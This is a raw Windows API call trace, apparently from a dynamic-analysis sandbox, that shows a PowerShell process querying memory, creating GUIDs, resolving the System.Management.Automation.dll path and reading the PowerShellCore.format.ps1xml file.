	[0143.956] VirtualQuery (in: lpAddress=0x1cbac0, lpBuffer=0x1cc980, dwLength=0x30 | out: lpBuffer=0x1cc980*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.956] VirtualQuery (in: lpAddress=0x1cba30, lpBuffer=0x1cc8f0, dwLength=0x30 | out: lpBuffer=0x1cc8f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.957] VirtualQuery (in: lpAddress=0x1cbac0, lpBuffer=0x1cc980, dwLength=0x30 | out: lpBuffer=0x1cc980*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.957] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0xc1762b4e, Data2=0x47e0, Data3=0x43a0, Data4=([0]=0xb7, [1]=0xc0, [2]=0xf3, [3]=0x63, [4]=0x22, [5]=0x80, [6]=0x8, [7]=0xd))) returned 0x0
	[0143.957] VirtualQuery (in: lpAddress=0x1cba30, lpBuffer=0x1cc8f0, dwLength=0x30 | out: lpBuffer=0x1cc8f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0144.054] VirtualQuery (in: lpAddress=0x1cbac0, lpBuffer=0x1cc980, dwLength=0x30 | out: lpBuffer=0x1cc980*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0144.055] VirtualQuery (in: lpAddress=0x1cba30, lpBuffer=0x1cc8f0, dwLength=0x30 | out: lpBuffer=0x1cc8f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0144.055] VirtualQuery (in: lpAddress=0x1cbac0, lpBuffer=0x1cc980, dwLength=0x30 | out: lpBuffer=0x1cc980*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0144.056] VirtualQuery (in: lpAddress=0x1cbac0, lpBuffer=0x1cc980, dwLength=0x30 | out: lpBuffer=0x1cc980*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0144.056] VirtualQuery (in: lpAddress=0x1cba30, lpBuffer=0x1cc8f0, dwLength=0x30 | out: lpBuffer=0x1cc8f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0144.056] VirtualQuery (in: lpAddress=0x1cbac0, lpBuffer=0x1cc980, dwLength=0x30 | out: lpBuffer=0x1cc980*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0144.056] VirtualQuery (in: lpAddress=0x1cba30, lpBuffer=0x1cc8f0, dwLength=0x30 | out: lpBuffer=0x1cc8f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0144.057] VirtualQuery (in: lpAddress=0x1cbac0, lpBuffer=0x1cc980, dwLength=0x30 | out: lpBuffer=0x1cc980*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0144.057] VirtualQuery (in: lpAddress=0x1cba30, lpBuffer=0x1cc8f0, dwLength=0x30 | out: lpBuffer=0x1cc8f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0144.057] VirtualQuery (in: lpAddress=0x1cbac0, lpBuffer=0x1cc980, dwLength=0x30 | out: lpBuffer=0x1cc980*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0144.057] VirtualQuery (in: lpAddress=0x1cb700, lpBuffer=0x1cc5c0, dwLength=0x30 | out: lpBuffer=0x1cc5c0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0144.058] VirtualQuery (in: lpAddress=0x1cba30, lpBuffer=0x1cc8f0, dwLength=0x30 | out: lpBuffer=0x1cc8f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0144.058] VirtualQuery (in: lpAddress=0x1cbac0, lpBuffer=0x1cc980, dwLength=0x30 | out: lpBuffer=0x1cc980*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0144.058] VirtualQuery (in: lpAddress=0x1cba30, lpBuffer=0x1cc8f0, dwLength=0x30 | out: lpBuffer=0x1cc8f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0144.059] VirtualQuery (in: lpAddress=0x1cbac0, lpBuffer=0x1cc980, dwLength=0x30 | out: lpBuffer=0x1cc980*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0144.059] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x4630aaf5, Data2=0x9ef6, Data3=0x44a7, Data4=([0]=0xb1, [1]=0xd6, [2]=0x7c, [3]=0x79, [4]=0x57, [5]=0xcb, [6]=0x2e, [7]=0xaf))) returned 0x0
	[0144.059] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0xdfe4bd4c, Data2=0x34d7, Data3=0x4051, Data4=([0]=0xab, [1]=0xa0, [2]=0xb1, [3]=0x12, [4]=0xa6, [5]=0xe8, [6]=0xf2, [7]=0x60))) returned 0x0
	[0144.059] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0xda25a7c9, Data2=0xf6b6, Data3=0x4836, Data4=([0]=0xb7, [1]=0x82, [2]=0xcf, [3]=0x1e, [4]=0x6b, [5]=0x17, [6]=0xf5, [7]=0x0))) returned 0x0
	[0144.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0144.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0144.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0144.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0144.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0144.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0144.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0144.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0144.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0144.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0144.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0144.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0144.062] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0xb88cd6b0, Data2=0xbdf3, Data3=0x4402, Data4=([0]=0x97, [1]=0x6c, [2]=0x38, [3]=0xb, [4]=0x32, [5]=0xe8, [6]=0xf2, [7]=0x79))) returned 0x0
	[0144.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0144.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0144.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0144.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0144.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0144.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0144.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0144.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0144.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0144.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0144.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0144.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0144.063] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x8e7f0633, Data2=0xbb8, Data3=0x4473, Data4=([0]=0xab, [1]=0xb7, [2]=0x2d, [3]=0x9, [4]=0xf1, [5]=0x8d, [6]=0x7d, [7]=0x32))) returned 0x0
	[0144.064] VirtualQuery (in: lpAddress=0x1cb810, lpBuffer=0x1cc6d0, dwLength=0x30 | out: lpBuffer=0x1cc6d0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0144.064] VirtualQuery (in: lpAddress=0x1cb8a0, lpBuffer=0x1cc760, dwLength=0x30 | out: lpBuffer=0x1cc760*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0144.064] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0xad58a4e3, Data2=0x6a71, Data3=0x4942, Data4=([0]=0x95, [1]=0x89, [2]=0x37, [3]=0xde, [4]=0x7a, [5]=0xd4, [6]=0xca, [7]=0x72))) returned 0x0
	[0144.064] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x96933b2d, Data2=0xd639, Data3=0x4afa, Data4=([0]=0xb0, [1]=0x1a, [2]=0x22, [3]=0xc5, [4]=0xce, [5]=0x41, [6]=0x3, [7]=0x7e))) returned 0x0
	[0144.065] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0xf7e9c903, Data2=0x62e2, Data3=0x400e, Data4=([0]=0xbe, [1]=0x9e, [2]=0xd5, [3]=0x76, [4]=0x13, [5]=0xbb, [6]=0x2f, [7]=0x83))) returned 0x0
	[0144.065] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0144.065] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0144.065] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0144.065] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0144.065] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0144.066] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0144.066] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0144.066] SetErrorMode (uMode=0x1) returned 0x1
	[0144.066] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x31c
	[0144.066] GetFileType (hFile=0x31c) returned 0x1
	[0144.066] SetErrorMode (uMode=0x1) returned 0x1
	[0144.066] GetFileType (hFile=0x31c) returned 0x1
	[0144.067] ReadFile (in: hFile=0x31c, lpBuffer=0x3a19cb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x3a19cb0*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0144.067] ReadFile (in: hFile=0x31c, lpBuffer=0x3a19cb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x3a19cb0*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0144.068] ReadFile (in: hFile=0x31c, lpBuffer=0x3a19cb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x3a19cb0*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0144.068] ReadFile (in: hFile=0x31c, lpBuffer=0x3a19cb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x3a19cb0*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0144.068] ReadFile (in: hFile=0x31c, lpBuffer=0x3a19cb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x3a19cb0*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0144.069] ReadFile (in: hFile=0x31c, lpBuffer=0x3a19cb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x3a19cb0*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0144.070] ReadFile (in: hFile=0x31c, lpBuffer=0x3a19cb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x3a19cb0*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0144.070] ReadFile (in: hFile=0x31c, lpBuffer=0x3a19cb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x3a19cb0*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0144.070] ReadFile (in: hFile=0x31c, lpBuffer=0x3a19cb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x3a19cb0*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0144.071] ReadFile (in: hFile=0x31c, lpBuffer=0x3a19cb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x3a19cb0*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0144.071] ReadFile (in: hFile=0x31c, lpBuffer=0x3a19cb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x3a19cb0*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0144.071] ReadFile (in: hFile=0x31c, lpBuffer=0x3a19cb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x3a19cb0*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0144.072] ReadFile (in: hFile=0x31c, lpBuffer=0x3a19cb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x3a19cb0*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0144.072] ReadFile (in: hFile=0x31c, lpBuffer=0x3a19cb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x3a19cb0*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0144.072] ReadFile (in: hFile=0x31c, lpBuffer=0x3a19cb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x3a19cb0*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0144.072] ReadFile (in: hFile=0x31c, lpBuffer=0x3a19cb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x3a19cb0*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0144.073] ReadFile (in: hFile=0x31c, lpBuffer=0x3a19cb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x3a19cb0*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
